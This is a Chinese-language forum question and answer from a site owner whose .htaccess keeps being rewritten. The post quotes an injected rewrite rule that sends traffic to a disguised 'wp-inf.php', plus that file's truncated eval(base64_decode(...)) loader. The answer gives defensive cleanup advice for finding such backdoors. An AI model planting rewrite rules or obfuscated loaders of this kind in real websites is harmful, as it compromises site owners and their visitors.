有东西在写我的 htaccess

Question

我有一个使用 codeigniter 构建的网站，我去年安装了 wordpress 来创建一个博客。但是从 3 周前开始，当我尝试访问我的管理站点并出现 codeigniter 404 错误时，问题就开始了。所以我意识到问题是 .htaccess 以某种方式是由某些东西编写的。我认为是wordpress，我删除了添加的代码，一切都很好，但是再次写入了htaccess，所以我删除了包含所有wordpress文件的博客文件夹，问题又出现了，然后我删除了wp_表我的数据库，但问题仍然存在。 已经写好的代码是：

# BEGIN SYSTEM API

    RewriteEngine on

    RewriteBase /

    RewriteCond %{REQUEST_FILENAME} !-f

    RewriteCond %{REQUEST_FILENAME} !-d

    RewriteRule ^al/(.*)$ myfolder/wp-inf.php?$1 [L]

    # END SYSTEM API

我搜索了 wp-inf.php 文件，发现如下内容：

<? eval(base64_decode("ICAgIGVycm9yX3JlcG9ydGluZygwKTsgICRscnUgPSAiZ2c.....")); ?>

我不知道该做什么或在哪里可以找到一直在编写我的 htaccess 的文件。我一直在清理和删除一些文件，但什么也没有。

希望你能帮我解决这个问题。 谢谢

编辑：****** 如果我解码 base64_decode 里面的内容，就会出现：

 error_reporting(0);  $lru = "gg/4623696-260514551155404-520n89823525745/765s127r625o9

(edited)

}echo $result; exit; } 

Answer 1

那么创建一个新服务器并传输数据将无济于事，因为它的文件正在编写您的 htaccess 而不是访问问题。您需要做的是在所有文件中搜索“base64_decode”和“eval”，并查看这些文件是否是 wordpress 的默认文件或创建和命名以混淆例如默认情况下没有名为 wp-inf.php 的文件WordPress的。这 2 个功能有 90% 被用于恶意目的。

• Base64_decode 用于解码任何编码字符串，使其难以阅读和搜索（混淆）。
• Eval 用于执行赋予它的任何 php 代码。

您可以使用此解码器来解码实际代码并查看其意图。 https://www.base64decode.org/

另一种方法是将您的文件夹结构与原始 wordpress 结构进行比较。

为避免以后发生这种情况，请尽量不要使用任何无效的主题或插件。